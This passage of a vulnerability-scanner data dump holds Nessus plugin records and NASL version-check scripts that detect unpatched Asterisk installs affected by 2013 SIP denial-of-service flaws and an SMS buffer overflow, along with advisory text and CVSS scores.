get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"asterisk-10.12.2-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:59:16", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
\n\nThe application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_005.NASL", "href": "https://www.tenable.com/plugins/nessus/69559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69559);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n\n script_name(english:\"Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. 
\n\nThe application does not properly handle an invalid SDP in a SIP request\nif such a request defines media descriptions and then defines connection\ndata.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 10.12.3 / 11.5.1 / Certified Asterisk\n1.8.15-cert3 / 11.2-cert2, or apply the appropriate patch listed in the\nAsterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n 
script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.3\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< 
tolower(version))\n {\n fixed = \"1.8.23.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:47", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
The application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "8007.PRM", "href": "https://www.tenable.com/plugins/nnm/8007", "sourceData": "Binary data 8007.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:47", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
The application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "8006.PRM", "href": "https://www.tenable.com/plugins/nnm/8006", "sourceData": "Binary data 8006.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
\n\nThe application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_004.NASL", "href": "https://www.tenable.com/plugins/nessus/69558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69558);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5641\");\n script_bugtraq_id(62021);\n\n script_name(english:\"Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. 
\n\nThe application does not properly handle 'ACK' messages with SDP after a\nchannel has been closed.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21064\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 11.5.1 / Certified Asterisk 1.8.15-cert3\n/ 11.2-cert2, or apply the appropriate patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.17.0 to < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n lower_cutoff = \"1.8.17.0\";\n fixed = \"1.8.23.1\";\n if (\n (ver_compare(ver:version, fix:lower_cutoff, app:\"asterisk\") >= 0)\n &&\n (ver_compare(ver:version, fix:fixed, app:\"asterisk\") < 0)\n )\n vulnerable = -1;\n }\n\n # Asterisk Certified 1.8.15-cert3\n if 
(version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:50", "description": "A vulnerability has been discovered and corrected in asterisk :\n\nBuffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message (CVE-2013-7100).\n\nThe updated 
packages have been upgraded to the 11.7.0 version which resolves various upstream bugs and is not vulnerable to this issue.", "cvss3": {}, "published": "2013-12-23T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:300)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", 
"p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-300.NASL", "href": "https://www.tenable.com/plugins/nessus/71607", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:300. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71607);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364);\n script_xref(name:\"MDVSA\", value:\"2013:300\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:300)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in asterisk :\n\nBuffer overflow in the unpacksms16 function in apps/app_sms.c in\nAsterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and\n11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones\nbefore 10.12.4-digiumphones; and Certified Asterisk 1.8.x before\n1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to\ncause a denial of service (daemon crash) via a 16-bit SMS message\n(CVE-2013-7100).\n\nThe updated packages has been upgraded to the 11.7.0 version which\nresolves various upstream bugs and is not vulnerable to this issue.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-11.7.0-summary.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8bcdde9f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22590\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No 
known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", 
